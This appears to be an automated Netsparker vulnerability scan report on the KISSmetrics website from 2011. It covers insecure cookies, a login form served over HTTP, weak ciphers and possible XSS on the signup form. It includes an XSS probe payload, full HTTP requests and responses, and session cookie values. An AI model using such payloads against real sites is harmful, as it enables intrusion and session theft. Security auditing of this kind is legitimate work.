("<b>IP</b>") address, browser type or the webpage you were visiting before you came to our Site, pages of our Site that you visit, the time spent on those pages, information you search for on our Site, access times and dates, and other statistics. We use this information to monitor and analyze use of the Site and the Service and for the Site’s technical administration, to increase our Site’s functionality and user-friendliness, and to better tailor it to our visitors’ needs.</p> <h3>Cookies</h3> <p>Like many websites, we use "cookies" to collect information. A cookie is a small data file that we transfer to your computer’s hard disk for record-keeping purposes. We use cookies for two purposes. First, we utilize persistent cookies to save your registration ID and login password for future logins to the Site. Second, we utilize session ID cookies to enable certain features of the Site, to better understand how you interact with the Site and to monitor aggregate usage by KISSmetrics Users and web traffic routing on the Site. Unlike persistent cookies, session cookies are deleted from your computer when you log off from the Site and Service and then close your browser. Third-party advertisers on the Site may also place or read cookies on your browser. You can instruct your browser, by changing its options, to stop accepting cookies or to prompt you before accepting a cookie from the websites you visit. If you do not accept cookies, however, you may not be able to use all portions of the Site or all functionality of the Service.</p> <h3>Phishing</h3> <p>Identity theft and the practice currently known as "phishing" are of great concern to KISSmetrics. Safeguarding information to help protect you from identity theft is a top priority. We do not and will not, at any time, request your credit card information, your account ID, login password, or national identification numbers in a non-secure or unsolicited e-mail or telephone communication. For more information about phishing, visit the Federal Trade Commission’s website.</p> <h3>Information Sharing and Disclosure</h3> <p><i>Aggregate Information and Non-Identifying Information.</i> We may share aggregated information that does not include personally identifiable information and we may otherwise disclose non-identifying Information and Log Data with third parties for industry analysis, demographic profiling and other purposes. Any aggregated information shared in these contexts will not contain your personally identifiable information.</p> <p><i>Service Providers.</i> We may employ third-party companies and individuals to facilitate our Site and Service, to provide the Service on our behalf, to perform Site-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Site’s features) or to assist us in analyzing how our Site and Service are used. These third parties have access to your personally identifiable information only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p> <p><i>Compliance with Laws and Law Enforcement.</i> KISSmetrics cooperates with government and law enforcement officials and private parties to enforce and comply with the law. We will disclose any information about you to government or law enforcement officials or private parties as we, in our sole discretion, believe necessary or appropriate to respond to claims and legal process (including but not limited to subpoenas), to protect the property and rights of KISSmetrics or a third party, to protect the safety of the public or any person, or to prevent or stop activity we may consider to be, or to pose a risk of being, any illegal, unethical or legally actionable activity. </p> <p><i>Business Transfers.</i> KISSmetrics may sell, transfer or otherwise share some or all of its assets, including your personally identifiable information, in connection with a merger, acquisition, reorganization or sale of assets or in the event of bankruptcy. </p> <h3>Changing or Deleting Your Information</h3> <p>All KISSmetrics Customers may review, update, correct or delete the personally identifiable information in their registration profile by contacting us. If you completely delete all such information, then your account may become deactivated. If you would like us to delete your record in our system, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a> with a request that we delete your personally identifiable information from our database. We will use commercially reasonable efforts to honor your request. We may retain an archived copy of your records as required by law or for legitimate business purposes.</p> <h3>Security</h3> <p>KISSmetrics is very concerned with safeguarding your information. We employ administrative, physical and electronic measures designed to protect your information from unauthorized access.</p> <p>We will make any legally required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored "personal data" (as defined in applicable state statutes on security breach notification) to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay, insofar as consistent with (i) the legitimate needs of law enforcement or (ii) any measures necessary to determine the scope of the breach and restore the reasonable integrity of the data system.</p> <h3>International Transfer</h3> <p>Your information may be transferred to — and maintained on — computers located outside of your state, province, country or other governmental jurisdiction where the privacy laws may not be as protective as those in your jurisdiction. If you are located outside the United States and choose to provide information to us, KISSmetrics transfers personally identifiable information to the United States and processes it there. Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p> <h3>Links to Other Sites</h3> <p>Our Site contains links to other websites. If you choose to visit a third party website, e.g. an advertiser by "clicking on" a banner ad or other type of advertisement, or click on another third-party link, you will be directed to that third party’s website. The fact that we link to a website or present a banner ad or other type of advertisement is not an endorsement, authorization or representation of our affiliation with that third party, nor is it an endorsement of their privacy or information security policies or practices. We do not exercise control over third-party websites. These other websites may place their own cookies or other files on your computer, collect data or solicit personal information from you. Other sites follow different rules regarding the use or disclosure of the personal information you submit to them. We encourage you to read the privacy policies or statements of the other websites you visit.</p> <h3>Our Policy Toward Children</h3> <p>Our Site and Service is not directed to children under 13. We do not knowingly collect personally identifiable information from children under 13. If a parent or guardian becomes aware that his or her child has provided us with personally identifiable information without their consent, he or she should contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>. If we become aware that a child under 13 has provided us with personally identifiable information, we will delete such information from our files.</p> <h3>Aligning Your Privacy Policy With Our Tools</h3> <p>For information on how you can align your KISSmetrics installation with your privacy policy please <a href="http://support.kissmetrics.com/misc/user-privacy">see here</a>.</p> <h3>Contacting Us</h3> <p>If you have any questions about this Privacy Policy, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p></div><!-- /.wrap --> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Mark..
Cookie Not Marked As Secure

Cookie Not Marked As Secure
1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

Identified Cookie

sid

Request

HEAD /privacy HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Accept: netsparker/check
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:10 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
Connection: keep-alive


Critical Form Served Over HTTP

Critical Form Served Over HTTP
1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
- /login

/login CONFIRMED

http://www.kissmetrics.com/login

Form target action

https://www.kissmetrics.com/login

Request

POST /login HTTP/1.1
Referer: http://www.kissmetrics.com/privacy
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 30
Expect: 100-continue
Accept-Encoding: gzip, deflate

login=&password=&remember_me=1

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:24 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
Content-Length: 1580
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign in to KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/signin.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <section id="main"> <div class="inner"> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <form action="https://www.kissmetrics.com/login" id="sign-in-form" method="POST"> <h1>Sign in to KISSmetrics</h1> <p class="error">We were unable to sign you in. Please enter a login.</p> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <!-- <span class="forgot"><a href="forgot-password.php">I forgot my password</a></span> --> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="sign-in-btn"> <a href="#" class="blue button with_arrow" onclick="$('#sign-in-form').submit(); return false;">Sign in to KISSmetrics</a> <span id="remember">&nbsp;<input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in</span> </p> <p>Help: <a href="/forgot_password">I forgot my password.</a></p></form><p class="center">Dont&rsquo;t have an account? <a href="/signup">Start your free 30-day trial now.</a></p> </div><!-- /.inner --> </section> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-1160402-19"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- "production" r 1669/1669 --> </body></html>
Weak Ciphers Detected

Weak Ciphers Detected
1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker detected your web server is configured to allow using weak ciphers during secure communication (SSL).

You should allow only strong ciphers on your web server to protect your secure communication with your visitors.

Impact

Attackers can mount brute-force attacks to decrypt your secure communication between your server and the visitors.

Remedy

Configure your webserver to disallow using weak ciphers.

For Apache, you should modify the SSLCipherSuite directive in the httpd.conf. 

	SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM

For Microsoft IIS, you should make some changes to the system registry.

  • Click Start, click Run, type regedt32 or type regedit, and then click OK.
  • In Registry Editor, locate the following registry key : HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders
  • Set "Enabled" DWORD to "0x0" for the following registry keys: 
    SCHANNEL\Ciphers\DES 56/56
SCHANNEL\Ciphers\RC4 64/128
SCHANNEL\Ciphers\RC4 40/128
SCHANNEL\Ciphers\RC2 56/128
SCHANNEL\Ciphers\RC2 40/128
SCHANNEL\Ciphers\NULL
SCHANNEL\Hashes\MD5

External References

Classification

PCI v1.2-6.5.9 PCI v2.0-6.5.4 WASC-04
- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

List of Supported Weak Ciphers

  • TLS_RSA_WITH_DES_CBC_SHA

Request

GET /privacy HTTP/1.0
Accept: */*
Host: www.kissmetrics.com

Response

[NETSPARKER] SSL Connection[NETSPARKER] SSL Connection
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting
4 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /signup

/signup

https://www.kissmetrics.com/signup

Parameters

Parameter Type Value
trp POST 30
account%5bmeta%5d%5bname%5d POST Smith
account%5bname%5d POST Smith
account%5bmeta%5d%5bcompany_size%5d POST 1 to 5 people
account%5bmeta%5d%5burl%5d POST '"--></style></script><script>alert(0x0004B2)</script>
user%5blogin%5d POST 3
account%5bmeta%5d%5bphone%5d POST 3
user%5bnew_password%5d POST 3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 301
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5bmeta%5d%5bname%5d=Smith&account%5bname%5d=Smith&account%5bmeta%5d%5bcompany_size%5d=1+to+5+people&account%5bmeta%5d%5burl%5d='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004B2)%3c%2fscript%3e&user%5blogin%5d=3&account%5bmeta%5d%5bphone%5d=3&user%5bnew_password%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:42:44 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
Content-Length: 5129
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup" method="post" id="signup_form"> <input name="trp" value="30" type="hidden"/> <h3>KISSmetrics free trial sign up</h3> <p>You are only a few steps away from starting your free KISSmetrics trial. Create an account name and password and you&rsquo;ll be all set.</p> <hr class="thin" /> <fieldset> <p> <label for="your_name">Your name:</label> <input class="text" name="account[meta][name]" value="Smith" id="your_name" type="text"/> </p> <p class="half"> <label for="account_name">Company name:</label> <input class="text" name="account[name]" value="Smith" id="account_name" type="text"/> </p> <p class="half"> <label for="account[meta][company_size]">Company size:</label> <select name="account[meta][company_size]"><option value="1 to 5 people" selected="selected">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="account[meta][url]">Company Website:</label> <input type="text" class="text" name="account[meta][url]" value="'"--></style></script><script>netsparker(0x0004B2)</script>" /> </p> <p class="half"> <label for="email">Email address:</label> <input class="text" name="user[login]" value="3" id="email" type="text"/> <span class="error">E-mail does not appear to be valid</span> </p> <p class="half"> <label for="account[meta][phone]">Telephone number:</label> <input class="text" name="account[meta][phone]" value="3" type="text"/> </p> <p class="clear"> <label for="password">Password:</label> <input class="text" name="user[new_password]" value="" id="new_password" type="password"/> <span class="error">New password must be at least 5 chars</span> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#signup_form').submit();} return false" class="blue button with_arrow">Create my account</a> <span class="note">By clicking the button above, you are agreeing with our <a href="/terms" target="_blank">Terms</a>.</span> </p> </fieldset> </form></div><!-- /.col --><div class="trial col side"> <p>Does your site have a huge number of active customers? Congratulations! We can handle it. KISSmetrics is already serving a number of customers who are sending us the actions of millions of people per day. <a href="/signup/enterprise">Contact us for more information.</a></p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text..
- /signup

/signup

https://www.kissmetrics.com/signup

Parameters

Parameter Type Value
trp POST 30
account%5Bmeta%5D%5Bname%5D POST Smith
account%5Bname%5D POST Smith
account%5Bmeta%5D%5Burl%5D POST '"--></style></script><script>alert(0x0004E9)</script>
user%5Blogin%5D POST 3
account%5Bmeta%5D%5Bphone%5D POST 3
user%5Bnew_password%5D POST 3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 251
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5Bmeta%5D%5Bname%5D=Smith&account%5Bname%5D=Smith&account%5Bmeta%5D%5Burl%5D='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004E9)%3c%2fscript%3e&user%5Blogin%5D=3&account%5Bmeta%5D%5Bphone%5D=3&user%5Bnew_password%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:44:48 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


